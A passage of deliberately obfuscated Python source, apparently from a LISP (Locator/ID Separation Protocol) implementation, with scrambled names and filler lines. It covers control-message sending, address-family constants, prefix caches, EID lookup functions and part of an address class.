if 31 - 31: oO0o * oO0o % o0oOOo0O0Ooo . O0 + iII111i
iIiiiII11II . to_etr = to_etr if lisp_is_running ( "lisp-etr" ) else False
iIiiiII11II . to_ms = to_ms if lisp_is_running ( "lisp-ms" ) else False
iIiiiII11II . ddt = ddt
ooIiii = iIiiiII11II . encode ( packet , inner_source , inner_dest )
if ( ooIiii == None ) :
lprint ( "Could not encode ECM message" )
return
if 71 - 71: ooOoO0o
iIiiiII11II . print_ecm ( )
if 71 - 71: i1IIi - oO0o / ooOoO0o * Ii1I
packet = ooIiii + packet
if 28 - 28: II111iiii . IiII / iII111i + I1ii11iIi11i - ooOoO0o * iIii1I11I1II1
Oo0o = outer_dest . print_address_no_iid ( )
lprint ( "Send Encapsulated-Control-Message to {}" . format ( Oo0o ) )
OooOOooo = lisp_convert_4to6 ( Oo0o )
lisp_send ( lisp_sockets , OooOOooo , LISP_CTRL_PORT , packet )
return
if 53 - 53: Ii1I - Ii1I . Oo0Ooo . OOooOOo / OoooooooOO + iII111i
if 52 - 52: IiII / OOooOOo * iIii1I11I1II1 + o0oOOo0O0Ooo
if 20 - 20: I1Ii111
if 33 - 33: i11iIiiIii / I1Ii111 + IiII / II111iiii + I11i
if 13 - 13: i1IIi % iII111i + OoOoOO00 / Ii1I . Ii1I + II111iiii
if 44 - 44: OoOoOO00 / OoooooooOO % O0 * Ii1I * IiII
if 84 - 84: o0oOOo0O0Ooo * IiII * OOooOOo * iII111i
LISP_AFI_GEO_COORD = - 3
LISP_AFI_IID_RANGE = - 2
LISP_AFI_ULTIMATE_ROOT = - 1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
if 56 - 56: iII111i * II111iiii . OoooooooOO . I11i
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
if 25 - 25: ooOoO0o % o0oOOo0O0Ooo - i11iIiiIii
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
if 79 - 79: iII111i - I1IiiI % O0 / Oo0Ooo + OoOoOO00 . Oo0Ooo
if 59 - 59: I1ii11iIi11i * OoOoOO00 / Ii1I
if 80 - 80: IiII - ooOoO0o / OoOoOO00 / I11i * O0 + oO0o
if 77 - 77: ooOoO0o + I1ii11iIi11i * o0oOOo0O0Ooo / i1IIi * I11i
if 70 - 70: oO0o / iII111i * i1IIi / II111iiii / OoOoOO00 + oO0o
if 30 - 30: i1IIi - iII111i - i11iIiiIii . OoOoOO00 . o0oOOo0O0Ooo
if 74 - 74: i11iIiiIii / II111iiii
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
if 62 - 62: O0
if 63 - 63: Oo0Ooo + Oo0Ooo
if 48 - 48: Oo0Ooo * I1ii11iIi11i % II111iiii
if 42 - 42: I1Ii111 - ooOoO0o % o0oOOo0O0Ooo * I1IiiI . o0oOOo0O0Ooo
if 84 - 84: iIii1I11I1II1
if 39 - 39: Ii1I . II111iiii / I1IiiI
def byte_swap_64 ( address ) :
oOOOo0o = ( ( address & 0x00000000000000ff ) << 56 ) | ( ( address & 0x000000000000ff00 ) << 40 ) | ( ( address & 0x0000000000ff0000 ) << 24 ) | ( ( address & 0x00000000ff000000 ) << 8 ) | ( ( address & 0x000000ff00000000 ) >> 8 ) | ( ( address & 0x0000ff0000000000 ) >> 24 ) | ( ( address & 0x00ff000000000000 ) >> 40 ) | ( ( address & 0xff00000000000000 ) >> 56 )
if 44 - 44: Ii1I / Ii1I / OoO0O00 % ooOoO0o / I11i . I1ii11iIi11i
if 41 - 41: I1ii11iIi11i * ooOoO0o * I11i + O0 * O0 - O0
if 81 - 81: I1Ii111 % OoO0O00 / O0
if 55 - 55: i1IIi - I1Ii111 + I11i
if 93 - 93: I1IiiI % IiII . OoOoOO00 + iII111i
if 81 - 81: ooOoO0o / I1Ii111 + OOooOOo / Oo0Ooo / OoOoOO00
if 34 - 34: ooOoO0o * iIii1I11I1II1 % i11iIiiIii * OOooOOo - OOooOOo
if 63 - 63: Oo0Ooo / oO0o + iII111i % OoooooooOO * I11i
return ( oOOOo0o )
if 34 - 34: I1IiiI + I1Ii111 % ooOoO0o
if 24 - 24: Ii1I % II111iiii - i11iIiiIii
if 52 - 52: OoO0O00
if 76 - 76: ooOoO0o - iII111i % ooOoO0o / oO0o . OOooOOo
if 50 - 50: IiII . i11iIiiIii % I11i
if 22 - 22: i1IIi - II111iiii - OoOoOO00 . iII111i
if 43 - 43: I1Ii111 * OOooOOo - IiII . i11iIiiIii
if 34 - 34: iII111i . OoOoOO00
if 49 - 49: I1ii11iIi11i % oO0o - I1Ii111 . I1ii11iIi11i % II111iiii
if 20 - 20: I1ii11iIi11i . iIii1I11I1II1 - Ii1I % OoO0O00
if 27 - 27: iIii1I11I1II1 / I1Ii111 - I11i . OoO0O00 + ooOoO0o
if 89 - 89: I1IiiI % I11i - OOooOOo
if 71 - 71: OOooOOo % Oo0Ooo - o0oOOo0O0Ooo / I1Ii111 - O0 - oO0o
if 10 - 10: I1IiiI
if 17 - 17: i11iIiiIii % o0oOOo0O0Ooo . ooOoO0o
class lisp_cache_entries ( object ) :
def __init__ ( self ) :
self . entries = { }
self . entries_sorted = [ ]
if 34 - 34: OoooooooOO / iII111i / O0
if 75 - 75: I11i % OOooOOo - OoO0O00 * I11i * IiII
if 11 - 11: I1ii11iIi11i . O0 - iII111i * IiII . i1IIi . iII111i
class lisp_cache ( object ) :
def __init__ ( self ) :
self . cache = { }
self . cache_sorted = [ ]
self . cache_count = 0
if 82 - 82: i1IIi * I11i * Ii1I - IiII . i11iIiiIii
if 40 - 40: OOooOOo - OoooooooOO
def cache_size ( self ) :
return ( self . cache_count )
if 36 - 36: i1IIi % OoOoOO00 - i1IIi
if 5 - 5: I1IiiI . I1IiiI % II111iiii - I1Ii111
def build_key ( self , prefix ) :
if ( prefix . afi == LISP_AFI_ULTIMATE_ROOT ) :
O00o00 = 0
elif ( prefix . afi == LISP_AFI_IID_RANGE ) :
O00o00 = prefix . mask_len
else :
O00o00 = prefix . mask_len + 48
if 97 - 97: I11i . ooOoO0o
if 87 - 87: oO0o / iIii1I11I1II1 - I11i + OoooooooOO
i1oO00O = lisp_hex_string ( prefix . instance_id ) . zfill ( 8 )
O0ooO0O00oo0 = lisp_hex_string ( prefix . afi ) . zfill ( 4 )
if 79 - 79: I1ii11iIi11i * IiII . I1ii11iIi11i
if ( prefix . afi > 0 ) :
if ( prefix . is_binary ( ) ) :
iI = prefix . addr_length ( ) * 2
oOOOo0o = lisp_hex_string ( prefix . address ) . zfill ( iI )
else :
oOOOo0o = prefix . address
if 65 - 65: iII111i - Ii1I - II111iiii * O0 + I1ii11iIi11i . iIii1I11I1II1
elif ( prefix . afi == LISP_AFI_GEO_COORD ) :
O0ooO0O00oo0 = "8003"
oOOOo0o = prefix . address . print_geo ( )
else :
O0ooO0O00oo0 = ""
oOOOo0o = ""
if 76 - 76: OoO0O00 * ooOoO0o
if 32 - 32: O0 . oO0o * o0oOOo0O0Ooo . Ii1I + IiII
III11II111 = i1oO00O + O0ooO0O00oo0 + oOOOo0o
return ( [ O00o00 , III11II111 ] )
if 98 - 98: iII111i . II111iiii % O0
if 43 - 43: OOooOOo % I1Ii111 . IiII % OoO0O00 + I1Ii111 % OoooooooOO
def add_cache ( self , prefix , entry ) :
if ( prefix . is_binary ( ) ) : prefix . zero_host_bits ( )
O00o00 , III11II111 = self . build_key ( prefix )
if ( O00o00 not in self . cache ) :
self . cache [ O00o00 ] = lisp_cache_entries ( )
self . cache_sorted = self . sort_in_entry ( self . cache_sorted , O00o00 )
if 17 - 17: OoooooooOO - i1IIi * I11i
if ( III11II111 not in self . cache [ O00o00 ] . entries ) :
self . cache_count += 1
if 33 - 33: i1IIi . Oo0Ooo + I11i
self . cache [ O00o00 ] . entries [ III11II111 ] = entry
if 97 - 97: OOooOOo / IiII / ooOoO0o / OoooooooOO
if 78 - 78: I1Ii111 + I1Ii111
def lookup_cache ( self , prefix , exact ) :
i1IIiii1IiIII , III11II111 = self . build_key ( prefix )
if ( exact ) :
if ( i1IIiii1IiIII not in self . cache ) : return ( None )
if ( III11II111 not in self . cache [ i1IIiii1IiIII ] . entries ) : return ( None )
return ( self . cache [ i1IIiii1IiIII ] . entries [ III11II111 ] )
if 56 - 56: OoOoOO00
if 36 - 36: OoO0O00 * I1IiiI + o0oOOo0O0Ooo % II111iiii + OOooOOo . OoooooooOO
iIi111Ii1 = None
for O00o00 in self . cache_sorted :
if ( i1IIiii1IiIII < O00o00 ) : return ( iIi111Ii1 )
for iIiiI11II11i in list ( self . cache [ O00o00 ] . entries . values ( ) ) :
if ( prefix . is_more_specific ( iIiiI11II11i . eid ) ) :
if ( iIi111Ii1 == None or
iIiiI11II11i . eid . is_more_specific ( iIi111Ii1 . eid ) ) : iIi111Ii1 = iIiiI11II11i
if 14 - 14: o0oOOo0O0Ooo / OOooOOo . ooOoO0o % O0
if 35 - 35: ooOoO0o - i1IIi
if 11 - 11: Oo0Ooo + oO0o / I1ii11iIi11i / OoOoOO00
return ( iIi111Ii1 )
if 49 - 49: Ii1I * I1ii11iIi11i
if 66 - 66: ooOoO0o
def delete_cache ( self , prefix ) :
O00o00 , III11II111 = self . build_key ( prefix )
if ( O00o00 not in self . cache ) : return
if ( III11II111 not in self . cache [ O00o00 ] . entries ) : return
self . cache [ O00o00 ] . entries . pop ( III11II111 )
self . cache_count -= 1
if 2 - 2: o0oOOo0O0Ooo
if 86 - 86: OoooooooOO * I1ii11iIi11i + O0 + o0oOOo0O0Ooo + OOooOOo % OoO0O00
def walk_cache ( self , function , parms ) :
for O00o00 in self . cache_sorted :
for iIiiI11II11i in list ( self . cache [ O00o00 ] . entries . values ( ) ) :
o0o0O0O0Oooo0 , parms = function ( iIiiI11II11i , parms )
if ( o0o0O0O0Oooo0 == False ) : return ( parms )
if 34 - 34: I1IiiI + i1IIi . II111iiii . O0
if 86 - 86: oO0o . OoOoOO00 - I11i . OOooOOo % OoO0O00
return ( parms )
if 79 - 79: iII111i / Ii1I % i11iIiiIii . I1IiiI % OoO0O00 / i11iIiiIii
if 100 - 100: OOooOOo + Oo0Ooo . iIii1I11I1II1 . ooOoO0o * Oo0Ooo
def sort_in_entry ( self , table , value ) :
if ( table == [ ] ) : return ( [ value ] )
if 16 - 16: Oo0Ooo % OoOoOO00 + I1Ii111 % I1Ii111
Ii1I111Ii = table
while ( True ) :
if ( len ( Ii1I111Ii ) == 1 ) :
if ( value == Ii1I111Ii [ 0 ] ) : return ( table )
OOOooo0OooOoO = table . index ( Ii1I111Ii [ 0 ] )
if ( value < Ii1I111Ii [ 0 ] ) :
return ( table [ 0 : OOOooo0OooOoO ] + [ value ] + table [ OOOooo0OooOoO : : ] )
if 12 - 12: I1Ii111 . Ii1I / iIii1I11I1II1 + i1IIi
if ( value > Ii1I111Ii [ 0 ] ) :
return ( table [ 0 : OOOooo0OooOoO + 1 ] + [ value ] + table [ OOOooo0OooOoO + 1 : : ] )
if 9 - 9: iIii1I11I1II1
if 75 - 75: I11i . II111iiii * I1IiiI * IiII
OOOooo0OooOoO = old_div ( len ( Ii1I111Ii ) , 2 )
Ii1I111Ii = Ii1I111Ii [ 0 : OOOooo0OooOoO ] if ( value < Ii1I111Ii [ OOOooo0OooOoO ] ) else Ii1I111Ii [ OOOooo0OooOoO : : ]
if 36 - 36: OOooOOo / I1ii11iIi11i / oO0o / ooOoO0o / I11i
if 7 - 7: OoO0O00 - I11i - o0oOOo0O0Ooo / o0oOOo0O0Ooo + i11iIiiIii
return ( [ ] )
if 28 - 28: OoOoOO00 % ooOoO0o . I1IiiI + II111iiii
if 34 - 34: iIii1I11I1II1
def print_cache ( self ) :
lprint ( "Printing contents of {}: " . format ( self ) )
if ( self . cache_size ( ) == 0 ) :
lprint ( " Cache is empty" )
return
if 65 - 65: II111iiii - iII111i / o0oOOo0O0Ooo
for O00o00 in self . cache_sorted :
for III11II111 in self . cache [ O00o00 ] . entries :
iIiiI11II11i = self . cache [ O00o00 ] . entries [ III11II111 ]
lprint ( " Mask-length: {}, key: {}, entry: {}" . format ( O00o00 , III11II111 ,
iIiiI11II11i ) )
if 35 - 35: i11iIiiIii - Oo0Ooo . I1ii11iIi11i % OoOoOO00
if 20 - 20: OoO0O00
if 93 - 93: ooOoO0o + o0oOOo0O0Ooo - I1ii11iIi11i
if 56 - 56: Ii1I / Oo0Ooo
if 96 - 96: o0oOOo0O0Ooo . II111iiii
if 14 - 14: OoooooooOO - i1IIi / i11iIiiIii - OOooOOo - i11iIiiIii . ooOoO0o
if 8 - 8: oO0o * O0 - II111iiii + I1IiiI
if 85 - 85: OoooooooOO % i11iIiiIii / IiII % OoOoOO00 + O0
lisp_referral_cache = lisp_cache ( )
lisp_ddt_cache = lisp_cache ( )
lisp_sites_by_eid = lisp_cache ( )
lisp_map_cache = lisp_cache ( )
lisp_db_for_lookups = lisp_cache ( )
if 6 - 6: OoooooooOO
if 97 - 97: II111iiii + o0oOOo0O0Ooo * II111iiii
if 17 - 17: o0oOOo0O0Ooo / ooOoO0o + i1IIi
if 78 - 78: iIii1I11I1II1 * o0oOOo0O0Ooo * Oo0Ooo - OoO0O00 / OoO0O00
if 89 - 89: o0oOOo0O0Ooo % o0oOOo0O0Ooo
if 8 - 8: Ii1I % oO0o - o0oOOo0O0Ooo
if 14 - 14: OOooOOo * IiII
def lisp_map_cache_lookup ( source , dest ) :
if 15 - 15: o0oOOo0O0Ooo + OoooooooOO - OOooOOo - o0oOOo0O0Ooo . iIii1I11I1II1 / Ii1I
oOoiii = dest . is_multicast_address ( )
if 33 - 33: OoO0O00
if 91 - 91: I11i % I11i % iII111i
if 19 - 19: I11i / I11i + I1IiiI * OoO0O00 - iII111i . Oo0Ooo
if 76 - 76: iII111i % OOooOOo / OoooooooOO . I1IiiI % OoO0O00 % i1IIi
I11 = lisp_map_cache . lookup_cache ( dest , False )
if ( I11 == None ) :
iIiI1I1ii1I1 = source . print_sg ( dest ) if oOoiii else dest . print_address ( )
iIiI1I1ii1I1 = green ( iIiI1I1ii1I1 , False )
dprint ( "Lookup for EID {} not found in map-cache" . format ( iIiI1I1ii1I1 ) )
return ( None )
if 95 - 95: Oo0Ooo - O0 / I1ii11iIi11i . I1IiiI / o0oOOo0O0Ooo % OoOoOO00
if 38 - 38: OoOoOO00 % OoooooooOO . oO0o - OoooooooOO + I11i
if 18 - 18: OoooooooOO + ooOoO0o * OoOoOO00 - OoO0O00
if 42 - 42: oO0o % OoOoOO00 - oO0o + I11i / i11iIiiIii
if 74 - 74: OoO0O00 - II111iiii - ooOoO0o % i1IIi
if ( oOoiii == False ) :
IiIIIIi11ii = green ( I11 . eid . print_prefix ( ) , False )
dprint ( "Lookup for EID {} found map-cache entry {}" . format ( green ( dest . print_address ( ) , False ) , IiIIIIi11ii ) )
if 42 - 42: i11iIiiIii / O0
return ( I11 )
if 8 - 8: I1Ii111
if 51 - 51: i11iIiiIii
if 1 - 1: iIii1I11I1II1 . i1IIi . i11iIiiIii % I1ii11iIi11i
if 58 - 58: i11iIiiIii * i11iIiiIii - OoO0O00
if 8 - 8: i11iIiiIii * OoOoOO00 . o0oOOo0O0Ooo
I11 = I11 . lookup_source_cache ( source , False )
if ( I11 == None ) :
iIiI1I1ii1I1 = source . print_sg ( dest )
dprint ( "Lookup for EID {} not found in map-cache" . format ( iIiI1I1ii1I1 ) )
return ( None )
if 27 - 27: I1ii11iIi11i + Ii1I % I1Ii111
if 20 - 20: Oo0Ooo
if 33 - 33: oO0o - OoOoOO00 - i11iIiiIii + I1Ii111 + iIii1I11I1II1
if 2 - 2: OoooooooOO + IiII / iII111i . iIii1I11I1II1 * OoOoOO00
if 84 - 84: OOooOOo
IiIIIIi11ii = green ( I11 . print_eid_tuple ( ) , False )
dprint ( "Lookup for EID {} found map-cache entry {}" . format ( green ( source . print_sg ( dest ) , False ) , IiIIIIi11ii ) )
if 68 - 68: I1Ii111
return ( I11 )
if 92 - 92: oO0o * Ii1I / OoO0O00 % II111iiii
if 54 - 54: oO0o + I11i - OoO0O00
if 86 - 86: OoooooooOO
if 51 - 51: i11iIiiIii
if 91 - 91: OOooOOo
if 22 - 22: OoooooooOO + OoOoOO00 - Ii1I . iII111i / OoooooooOO / I1IiiI
if 73 - 73: i1IIi - Ii1I + oO0o * iIii1I11I1II1
def lisp_referral_cache_lookup ( eid , group , exact ) :
if ( group and group . is_null ( ) ) :
iii1Ii = lisp_referral_cache . lookup_cache ( eid , exact )
return ( iii1Ii )
if 100 - 100: i11iIiiIii / iIii1I11I1II1 + Oo0Ooo + OoO0O00 - iII111i
if 8 - 8: i11iIiiIii . O0 + o0oOOo0O0Ooo * oO0o + II111iiii
if 61 - 61: ooOoO0o / ooOoO0o
if 51 - 51: iIii1I11I1II1 / oO0o * I1Ii111 + i1IIi
if 96 - 96: Oo0Ooo + oO0o - Oo0Ooo - OoOoOO00 % OOooOOo . iIii1I11I1II1
if ( eid == None or eid . is_null ( ) ) : return ( None )
if 93 - 93: iIii1I11I1II1 % OoooooooOO
if 6 - 6: II111iiii / oO0o - OOooOOo . O0 - o0oOOo0O0Ooo
if 72 - 72: iIii1I11I1II1 / OoooooooOO * ooOoO0o / ooOoO0o % O0 + IiII
if 96 - 96: iII111i / i11iIiiIii + Oo0Ooo . I1IiiI + iII111i % OoOoOO00
if 19 - 19: i11iIiiIii . Oo0Ooo . OoOoOO00 - I1IiiI
if 85 - 85: I11i - OoO0O00 % iIii1I11I1II1 . iII111i + ooOoO0o . Oo0Ooo
iii1Ii = lisp_referral_cache . lookup_cache ( group , exact )
if ( iii1Ii == None ) : return ( None )
if 87 - 87: iII111i
o000oOoO = iii1Ii . lookup_source_cache ( eid , exact )
if ( o000oOoO ) : return ( o000oOoO )
if 24 - 24: ooOoO0o / OoooooooOO % I1ii11iIi11i * ooOoO0o
if ( exact ) : iii1Ii = None
return ( iii1Ii )
if 14 - 14: I1ii11iIi11i + OoO0O00 - I1IiiI - Oo0Ooo
if 44 - 44: II111iiii / I1ii11iIi11i
if 39 - 39: OoooooooOO % OoO0O00
if 83 - 83: OOooOOo % I1IiiI + O0 % OoooooooOO
if 84 - 84: I11i - Oo0Ooo % ooOoO0o - II111iiii
if 29 - 29: IiII
if 4 - 4: II111iiii * o0oOOo0O0Ooo - IiII * iII111i
def lisp_ddt_cache_lookup ( eid , group , exact ) :
if ( group . is_null ( ) ) :
OooOoo0o = lisp_ddt_cache . lookup_cache ( eid , exact )
return ( OooOoo0o )
if 91 - 91: I1Ii111 * iII111i * OoO0O00
if 79 - 79: iII111i + oO0o
if 19 - 19: I1Ii111 - OOooOOo . ooOoO0o . O0 + II111iiii . OoooooooOO
if 97 - 97: O0 / OoOoOO00 / ooOoO0o
if 11 - 11: II111iiii . i11iIiiIii - Ii1I . IiII
if ( eid . is_null ( ) ) : return ( None )
if 10 - 10: OOooOOo * OoooooooOO
if 12 - 12: II111iiii - O0 . i1IIi % oO0o % OoooooooOO
if 36 - 36: IiII * OoOoOO00 - iIii1I11I1II1 + II111iiii
if 65 - 65: I1IiiI * I11i . I1Ii111 % I1ii11iIi11i + O0
if 91 - 91: OoooooooOO % I1Ii111 * OoO0O00 - OoOoOO00
if 5 - 5: iIii1I11I1II1 * I11i - oO0o % oO0o % o0oOOo0O0Ooo . i1IIi
OooOoo0o = lisp_ddt_cache . lookup_cache ( group , exact )
if ( OooOoo0o == None ) : return ( None )
if 95 - 95: Oo0Ooo * I1ii11iIi11i + iII111i - o0oOOo0O0Ooo - Oo0Ooo . OoO0O00
oOOo0OOo00 = OooOoo0o . lookup_source_cache ( eid , exact )
if ( oOOo0OOo00 ) : return ( oOOo0OOo00 )
if 43 - 43: I1Ii111 + I1Ii111 % Oo0Ooo % OoO0O00 - ooOoO0o
if ( exact ) : OooOoo0o = None
return ( OooOoo0o )
if 61 - 61: OoOoOO00 + Ii1I % i11iIiiIii - I1IiiI * OoO0O00 % iIii1I11I1II1
if 66 - 66: iII111i + i1IIi
if 24 - 24: O0 / OoooooooOO - OoOoOO00
if 51 - 51: OoO0O00 + o0oOOo0O0Ooo - II111iiii * I11i + Ii1I
if 16 - 16: I1Ii111 * i1IIi . I1IiiI . OOooOOo % Ii1I - o0oOOo0O0Ooo
if 89 - 89: Ii1I * I1ii11iIi11i * I1IiiI % iII111i % Ii1I + O0
if 53 - 53: i11iIiiIii % I1ii11iIi11i
def lisp_site_eid_lookup ( eid , group , exact ) :
if 59 - 59: OOooOOo
if ( group . is_null ( ) ) :
i1iI11i = lisp_sites_by_eid . lookup_cache ( eid , exact )
return ( i1iI11i )
if 61 - 61: OoooooooOO + O0 - i1IIi % oO0o / I1ii11iIi11i
if 50 - 50: oO0o + II111iiii * OoOoOO00 % OoO0O00 . II111iiii % o0oOOo0O0Ooo
if 32 - 32: i1IIi / Ii1I + i11iIiiIii % oO0o
if 11 - 11: Ii1I - ooOoO0o % i11iIiiIii / OoooooooOO - O0 - IiII
if 25 - 25: IiII + O0 + oO0o % iIii1I11I1II1 - II111iiii . I1IiiI
if ( eid . is_null ( ) ) : return ( None )
if 62 - 62: IiII . O0 + oO0o - ooOoO0o * iIii1I11I1II1
if 8 - 8: I1ii11iIi11i
if 65 - 65: i11iIiiIii
if 92 - 92: oO0o * II111iiii + I1Ii111
if 49 - 49: II111iiii * I1IiiI * O0 / ooOoO0o * IiII
if 94 - 94: OoO0O00 - I1IiiI * oO0o
i1iI11i = lisp_sites_by_eid . lookup_cache ( group , exact )
if ( i1iI11i == None ) : return ( None )
if 35 - 35: OOooOOo / i1IIi + OoO0O00
if 31 - 31: OoO0O00 . i1IIi / OoooooooOO
if 81 - 81: ooOoO0o . Oo0Ooo . OoOoOO00 + OOooOOo % iII111i - oO0o
if 68 - 68: iII111i - O0 / Ii1I
if 15 - 15: I1Ii111 / I1ii11iIi11i / I1IiiI % i11iIiiIii + II111iiii . ooOoO0o
if 74 - 74: o0oOOo0O0Ooo
if 4 - 4: I1ii11iIi11i * II111iiii - Oo0Ooo % i1IIi % O0 * i11iIiiIii
if 62 - 62: OoO0O00 * I1Ii111 * Ii1I / ooOoO0o
if 27 - 27: oO0o . iII111i . oO0o
if 37 - 37: Oo0Ooo . I1ii11iIi11i / OoooooooOO % ooOoO0o / I1IiiI + ooOoO0o
if 14 - 14: I11i + ooOoO0o . oO0o * I11i
if 98 - 98: Ii1I . i1IIi * OoO0O00 * Ii1I * iIii1I11I1II1
if 22 - 22: OoooooooOO - OoO0O00 + OoOoOO00 - OOooOOo + i11iIiiIii - oO0o
if 9 - 9: I1Ii111 - i1IIi . ooOoO0o
if 33 - 33: I11i
if 37 - 37: Oo0Ooo
if 36 - 36: IiII % I11i
if 72 - 72: oO0o % I11i % OOooOOo * iIii1I11I1II1 - OOooOOo % O0
OoiIii11i11i = i1iI11i . lookup_source_cache ( eid , exact )
if ( OoiIii11i11i ) : return ( OoiIii11i11i )
if 84 - 84: oO0o - o0oOOo0O0Ooo / II111iiii . o0oOOo0O0Ooo
if ( exact ) :
i1iI11i = None
else :
O0O0oO00 = i1iI11i . parent_for_more_specifics
if ( O0O0oO00 and O0O0oO00 . accept_more_specifics ) :
if ( group . is_more_specific ( O0O0oO00 . group ) ) : i1iI11i = O0O0oO00
if 82 - 82: OoooooooOO
if 14 - 14: OoO0O00 / oO0o - OOooOOo
return ( i1iI11i )
if 100 - 100: IiII - I11i . iIii1I11I1II1 / iIii1I11I1II1
if 16 - 16: IiII + Oo0Ooo % I11i
if 16 - 16: ooOoO0o / I1Ii111
if 78 - 78: OoOoOO00 - II111iiii - OOooOOo + I1IiiI + O0 / I1IiiI
if 59 - 59: OOooOOo . I1IiiI / i1IIi / II111iiii . II111iiii
if 54 - 54: iIii1I11I1II1 % ooOoO0o
if 37 - 37: OOooOOo % OoOoOO00 - II111iiii * o0oOOo0O0Ooo . I1IiiI . OoOoOO00
if 92 - 92: I11i + OoO0O00 . OoooooooOO
if 3 - 3: OoO0O00 % iIii1I11I1II1
if 62 - 62: OoooooooOO * o0oOOo0O0Ooo
if 59 - 59: iIii1I11I1II1
if 18 - 18: ooOoO0o % I1IiiI / iIii1I11I1II1 + O0
if 99 - 99: i11iIiiIii - o0oOOo0O0Ooo + o0oOOo0O0Ooo . OoooooooOO * iII111i . Oo0Ooo
if 63 - 63: I11i
if 60 - 60: I1IiiI / I1ii11iIi11i / I11i / Ii1I + iIii1I11I1II1
if 85 - 85: O0 / OOooOOo . OoOoOO00 / I1ii11iIi11i
if 80 - 80: I1ii11iIi11i * iII111i % i1IIi * OOooOOo % II111iiii % i1IIi
if 44 - 44: OoooooooOO
if 18 - 18: i11iIiiIii
if 65 - 65: i1IIi . iIii1I11I1II1 % iIii1I11I1II1
if 35 - 35: iIii1I11I1II1 - o0oOOo0O0Ooo + I1ii11iIi11i * iII111i - OOooOOo . o0oOOo0O0Ooo
if 12 - 12: iIii1I11I1II1 % OoO0O00 * Oo0Ooo
if 5 - 5: I11i - II111iiii * iIii1I11I1II1 / iIii1I11I1II1 % IiII * i1IIi
if 30 - 30: i1IIi % I1IiiI . OOooOOo % iIii1I11I1II1 . I1ii11iIi11i / o0oOOo0O0Ooo
if 53 - 53: OOooOOo % ooOoO0o
if 94 - 94: OOooOOo - O0 - I1Ii111 / OoooooooOO - iII111i
class lisp_address ( object ) :
def __init__ ( self , afi , addr_str , mask_len , iid ) :
self . afi = afi
self . mask_len = mask_len
self . instance_id = iid
self . iid_list = [ ]
self . address = 0
if ( addr_str != "" ) : self . store_address ( addr_str )
if 83 - 83: OOooOOo * I1ii11iIi11i * iII111i * I1ii11iIi11i . OoO0O00
if 87 - 87: ooOoO0o . O0 - oO0o
def copy_address ( self , addr ) :
if ( addr == None ) : return
self . afi = addr . afi
self . address = addr . address
self . mask_len = addr . mask_len
self . instance_id = addr . instance_id
self . iid_list = addr . iid_list
if 75 - 75: Oo0Ooo
if 22 - 22: oO0o * I1Ii111 . II111iiii / Ii1I * O0
def make_default_route ( self , addr ) :
self . afi = addr . afi
self . instance_id = addr . instance_id
self . mask_len = 0
self . address = 0
if 33 - 33: oO0o * i1IIi + ooOoO0o * OOooOOo - O0 - iIii1I11I1II1
if 35 - 35: I1Ii111
def make_default_multicast_route ( self , addr ) :
self . afi = addr . afi
self . instance_id = addr . instance_id
if ( self . afi == LISP_AFI_IPV4 ) :
self . address = 0xe0000000
self . mask_len = 4
if 12 - 12: Ii1I % I1IiiI - I11i / iIii1I11I1II1 . I1IiiI % I1ii11iIi11i
if ( self . afi == LISP_AFI_IPV6 ) :
self . address = 0xff << 120
self . mask_len = 8
if 12 - 12: Oo0Ooo + I1IiiI
if ( self . afi == LISP_AFI_MAC ) :
self . address = 0xffffffffffff
self . mask_len = 48
if 12 - 12: OoOoOO00 / II111iiii
if 100 - 100: I1ii11iIi11i % iIii1I11I1II1 . IiII . OoooooooOO / II111iiii
if 28 - 28: I1IiiI
def not_set ( self ) :
return ( self . afi == LISP_AFI_NONE )
if 27 - 27: I1IiiI % oO0o - iIii1I11I1II1 - o0oOOo0O0Ooo - IiII - O0
if 46 - 46: II111iiii
def is_private_address ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
oOOOo0o = self . address
if ( ( ( oOOOo0o & 0xff000000 ) >> 24 ) == 10 ) : return ( True )
if ( ( ( oOOOo0o & 0xff000000 ) >> 24 ) == 172 ) :
IiIiI1IIi1Ii = ( oOOOo0o & 0x00ff0000 ) >> 16
if ( IiIiI1IIi1Ii >= 16 and IiIiI1IIi1Ii <= 31 ) : return ( True )
if 5 - 5: i11iIiiIii . OoO0O00 - oO0o - OoooooooOO % IiII * O0
if ( ( ( oOOOo0o & 0xffff0000 ) >> 16 ) == 0xc0a8 ) : return ( True )
return ( False )
if 48 - 48: Ii1I / Ii1I / i1IIi * I1IiiI . iII111i + I1ii11iIi11i
if 66 - 66: iIii1I11I1II1 . iIii1I11I1II1 + I1ii11iIi11i
def is_multicast_address ( self ) :
if ( self . is_ipv4 ( ) ) : return ( self . is_ipv4_multicast ( ) )
if ( self . is_ipv6 ( ) ) : return ( self . is_ipv6_multicast ( ) )
if ( self . is_mac ( ) ) : return ( self . is_mac_multicast ( ) )
return ( False )
if 45 - 45: iII111i . oO0o * iII111i
if 3 - 3: OoOoOO00 / Oo0Ooo - Oo0Ooo
def host_mask_len ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( LISP_IPV4_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_IPV6 ) : return ( LISP_IPV6_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_MAC ) : return ( LISP_MAC_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_E164 ) : return ( LISP_E164_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_NAME ) : return ( len ( self . address ) * 8 )
if ( self . afi == LISP_AFI_GEO_COORD ) :
return ( len ( self . address . print_geo ( ) ) * 8 )
if 54 - 54: Oo0Ooo . OoO0O00 * I1IiiI % IiII
return ( 0 )
if 97 - 97: o0oOOo0O0Ooo + Ii1I
if 77 - 77: I11i - oO0o . Ii1I
def is_iana_eid ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
oOOOo0o = self . address >> 96
